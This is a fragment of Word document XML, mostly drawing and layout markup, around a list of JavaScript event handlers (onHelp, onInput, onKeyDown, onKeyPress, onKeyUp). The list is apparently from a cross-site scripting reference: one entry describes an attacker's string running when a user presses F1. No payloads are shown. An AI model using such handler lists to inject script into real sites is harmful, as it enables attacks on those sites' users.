                <v:shape id="Freeform 1027" o:spid="_x0000_s1408" style="position:absolute;left:1930;top:167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gygcEA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP24rCMBB9F/yHMAu+yJoouGjXKCKIFwTx8gFDM9sW&#10;m0lpYq1/bwRh3+ZwrjNbtLYUDdW+cKxhOFAgiFNnCs40XC/r7wkIH5ANlo5Jw5M8LObdzgwT4x58&#10;ouYcMhFD2CeoIQ+hSqT0aU4W/cBVxJH7c7XFEGGdSVPjI4bbUo6U+pEWC44NOVa0yim9ne9Ww2Z3&#10;KH17xa294HS4P97UoekrrXtf7fIXRKA2/Is/7q2J89VoDO9v4gl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14MoHBAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,349;21,349;18,349;0,328;0,325;0,188;21,167;720,167;741,188;741,328;723,349;720,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1026" o:spid="_x0000_s1409" type="#_x0000_t202" style="position:absolute;left:1930;top:167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gAN8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeaqKHpV2NImKhUChdt4cex824&#10;G9xM1k2q6783gtDbPN7nLFaDa8WZ+mA9a5hOFAjiyhvLtYaf8v3lFUSIyAZbz6ThSgFWy9HTAnPj&#10;L1zQeRdrkUI45KihibHLpQxVQw7DxHfEiTv43mFMsK+l6fGSwl0rZ0pl0qHl1NBgR5uGquPuz2lY&#10;/3Kxtaev/XdxKGxZvin+zI5aP4+H9RxEpCH+ix/uD5Pmq1kG92/SC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gAN8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onHelp()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>hits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>F1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>while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window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>focus)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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:ind w:left="1336" w:hanging="1147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497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525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1021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154"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1022" name="Freeform 1024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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827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Text Box 102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onInput()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2" o:spid="_x0000_s1410" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:41.35pt;height:9.15pt;z-index:-17621504;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1024" o:spid="_x0000_s1411" style="position:absolute;left:1930;top:154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gbQsIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPy6rCMBDdC/5DGOFu5JrahWg1ig9EF26scnE5NGNb&#10;bCalydX690YQ3M3hPGe2aE0l7tS40rKC4SACQZxZXXKu4Hza/o5BOI+ssbJMCp7kYDHvdmaYaPvg&#10;I91Tn4sQwi5BBYX3dSKlywoy6Aa2Jg7c1TYGfYBNLnWDjxBuKhlH0UgaLDk0FFjTuqDslv4bBYfV&#10;Jp9s/3b+IuPzpH+7rFBnR6V+eu1yCsJT67/ij3uvw/wojuH9TThB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+BtCwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,336;21,336;18,336;0,315;0,312;0,175;21,154;805,154;826,175;826,315;809,336;805,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1023" o:spid="_x0000_s1412" type="#_x0000_t202" style="position:absolute;left:1930;top:154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+jr8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNamC1K1RRFoQhNJ1PfQ43Yy7&#10;wc1k3URd/31TKHibx/ucxap3jbhSF6xnDS9jBYK49MZypeFQfDy/gggR2WDjmTTcKcBqOXhaYGb8&#10;jXO67mMlUgiHDDXUMbaZlKGsyWEY+5Y4cUffOYwJdpU0Hd5SuGvkRKmZdGg5NdTY0qam8rS/OA3r&#10;b87f7fnz5ys/5rYo5op3s5PWo2G/fgMRqY8P8b97a9J8NZnC3zfp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+jr8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onInput()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>interface)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:hanging="1316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548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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1018" name="Group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166"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1019" name="Freeform 1021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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997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Text Box 102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onKeyDown()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9" o:spid="_x0000_s1413" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:49.85pt;height:9.15pt;z-index:-17620992;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 1021" o:spid="_x0000_s1414" style="position:absolute;left:1930;top:166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4FnsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9FN2khWKiawhKoYe2YNT7mB2T&#10;YHY2Zjea/vtuodDbPN7nrLLRtOJGvWssK4jnEQji0uqGKwWH/dtsAcJ5ZI2tZVLwTQ6y9eRhham2&#10;d97RrfCVCCHsUlRQe9+lUrqyJoNubjviwJ1tb9AH2FdS93gP4aaVz1H0Kg02HBpq7GhTU3kpBqPg&#10;85rI7ba95E9fH+fBDafj6UXHSj1Ox3wJwtPo/8V/7ncd5kdxAr/fhB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+BZ7EAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,348;21,348;18,348;0,327;0,324;0,187;21,166;976,166;997,187;997,327;979,348;976,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1020" o:spid="_x0000_s1415" type="#_x0000_t202" style="position:absolute;left:1930;top:166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092MYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P9B6PCbqvdHsqW1i1lbFAYjKXpoUct&#10;VhPTWM5it83+/XQY7Cbxnt77tNqMoVNXGpKPbGE2NaCI6+g8NxYO1dvjE6iUkR12kcnCDyXYrO/v&#10;Vli4eOOSrvvcKAnhVKCFNue+0DrVLQVM09gTi3aKQ8As69BoN+BNwkOn58YsdEDP0tBiTy8t1ef9&#10;JVjYHrl89d8fX5/lqfRV9Wz4fXG29mEybpegMo353/x3vXOCb+bCL9/ICHr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092M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onKeyDown()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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>depresses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>key)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589"/>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1589" w:hanging="1400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600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687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1015" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1016" name="Freeform 1018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1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082"/>
                              <a:gd name="T46" fmla="+- 0 349 167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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 101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108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onKeyPress()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6" o:spid="_x0000_s1416" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:54.1pt;height:9.15pt;z-index:-17620480;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="108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">
                <v:shape id="Freeform 1018" o:spid="_x0000_s1417" style="position:absolute;left:1930;top:167;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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sLxsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMEJvmtWCLFujtIIitIdWvXgbNrOb&#10;pZvJksR16683hUJv83ifs9oMthU9+dA4VjCfZSCIS6cbrhWcT7tpDiJEZI2tY1LwQwE26/FohYV2&#10;N/6i/hhrkUI4FKjAxNgVUobSkMUwcx1x4irnLcYEfS21x1sKt61cZNlSWmw4NRjsaGuo/D5erYLa&#10;7t/s7r3KzccZ/f362efPl0qpp8nw+gIi0hD/xX/ug07zs/kSfr9JJ8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sLxsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,349;21,349;18,349;0,328;0,325;0,188;21,167;1061,167;1082,188;1082,328;1064,349;1061,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1017" o:spid="_x0000_s1418" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:108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hvEcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYYTeNLEH265GkdKCUBDX7cHjuBl3&#10;g5vJdhN1/feNUPA2j/c582XvGnGhLljPGiZjBYK49MZypeGn+Bq9gQgR2WDjmTTcKMBy8TSYY2b8&#10;lXO67GIlUgiHDDXUMbaZlKGsyWEY+5Y4cUffOYwJdpU0HV5TuGvki1JT6dByaqixpY+aytPu7DSs&#10;9px/2t/NYZsfc1sU74q/pyetn4f9agYiUh8f4n/32qT5avIK92/SC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hvEc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onKeyPress()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>presses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>holds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>down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key)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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:ind w:left="1336" w:hanging="1147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651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525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1012" name="Group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154"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1013" name="Freeform 1015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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827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Text Box 101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onKeyUp()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3" o:spid="_x0000_s1419" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:41.35pt;height:9.15pt;z-index:-17619968;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
